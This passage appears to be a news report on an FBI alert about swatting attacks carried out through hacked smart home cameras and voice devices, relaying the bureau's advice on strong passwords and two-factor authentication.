The FBI has been working with the manufacturers of the targeted smart devices to warn their customers about the threat of swatting attacks and provide them with recommendations on how to protect their devices hacked.
The FBI recommends users to enable two-factor authentication (2FA) for smart devices exposed online. The FBI also recommends customers to don’t use an email account in 2FA for the second factor, instead recommends the use of a mobile device number.
“Users of smart home devices with cameras and/or voice capabilities are advised of the following guidance to maximize security.” concludes the alert.
Because offenders are using stolen email passwords to access smart devices, users should practice good cyber hygiene by ensuring they have strong, complex passwords or passphrases for their online accounts, and should not duplicate the use of passwords between different online accounts. Users should update their passwords on a regular basis.
Users should enable two-factor authentication for their online accounts and on all devices accessible through an internet connection in order to reduce the chance a criminal could access their devices.
It is highly recommended that the user’s second factor for two-factor or multi-factor authentication be a mobile device number and not a secondary e-mail account.
